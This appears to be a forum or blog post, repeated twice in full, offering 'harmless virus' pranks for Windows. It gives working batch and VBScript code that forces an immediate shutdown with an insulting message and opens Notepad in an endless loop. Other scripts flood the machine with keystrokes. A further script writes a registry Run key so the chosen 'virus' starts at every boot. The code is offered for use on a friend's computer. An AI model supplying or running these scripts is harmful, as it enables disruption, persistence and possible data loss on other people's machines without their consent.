
Here are some more tricks I came across which act like a virus but they are not a virus actually. they are just simple programs. You need only Notepad to get them working.
Shutdown Computer showing a message:
Type in notepad
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s -t 0
Save it as "Anything.BAT" in All Files and run it to get affected.
Open Notepad continously in your computer:
Type in notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and run it to get affected.
Toggle your keyboard's Caps Lock button simultaneously:
Type in notepad
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and run it.
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type in notepad
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and run it.
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type in notepad
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and run it.
Type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .
Type in notepad
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and run it.
All this works until system will restart, so don't worry.
but if you wanna make it deadly that every time the computer starts this programs get excuted then follow these steps.
Open a notepad and type
@ECHO OFF
ECHO REGEDIT4 > anything.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> anything.reg
ECHO "VIRUS"="Path of the virus file you want to start when the computer starts" >> anything.reg
START anything.reg
Save it as anything.bat and run it. Note that in place of anything.reg you can enter any desired name but it should be same in the entire program. Also note that Path of the virus file you want to start when the computer starts is somewhat like this
drivename:\foldername1\foldername2\..\..\nameofvirusfile.bat
Shutdown Computer showing a message:
Type in notepad
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s -t 0
Save it as "Anything.BAT" in All Files and run it to get affected.
Open Notepad continously in your computer:
Type in notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and run it to get affected.
Toggle your keyboard's Caps Lock button simultaneously:
Type in notepad
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and run it.
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type in notepad
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and run it.
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type in notepad
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and run it.
Type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .
Type in notepad
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and run it.
All this works until system will restart, so don't worry.
but if you wanna make it deadly that every time the computer starts this programs get excuted then follow these steps.
Open a notepad and type
@ECHO OFF
ECHO REGEDIT4 > anything.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> anything.reg
ECHO "VIRUS"="Path of the virus file you want to start when the computer starts" >> anything.reg
START anything.reg
Save it as anything.bat and run it. Note that in place of anything.reg you can enter any desired name but it should be same in the entire program. Also note that Path of the virus file you want to start when the computer starts is somewhat like this
drivename:\foldername1\foldername2\..\..\nameofvirusfile.bat
